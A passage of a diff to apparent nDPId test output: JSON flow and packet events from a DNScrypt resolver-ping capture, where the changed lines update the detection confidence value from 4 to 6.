-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMggAH4RTqEKAAABVQVd5plbIPsGBOYr4+0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":477,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380984} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":477,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMgAuX4Rc3QKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":478,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380984} @@ -970,26 +970,26 @@ 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":946739381021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739381021,"pkt":"ZmZmZmZmRERERERECABFAADPeU5AADQRWShVBV3mCgAAASD7ynIAu49J4\/GBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAQmF4jrNkSB0NiNqctWCLsz9Hoe15aS6mrwyMq15DMDKxowa47TLEyU+dCwefDt3RvbYdetUltVlZd+8gb8kmCcgRT\/L7wkmA5gU0xv13eDWtHcb4jTpxlTH+X73K1n94yBFP8vvCSYAAAAABX1Nm5l9UuGY="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYVAAH4RyuMKAAABi2PeSMWpIPsCCCyCmlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYYgAH4R5yIKAAABi2PeSJ22IPsGBPDSmlQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYcgAH4R5yEKAAABi2PeSMk1IPsGBMVRmlYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":488,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739391046} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":488,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYYAuX4RC\/YKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYhAAH4RyuAKAAABi2PeSLJyIPsCCCyCmlcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA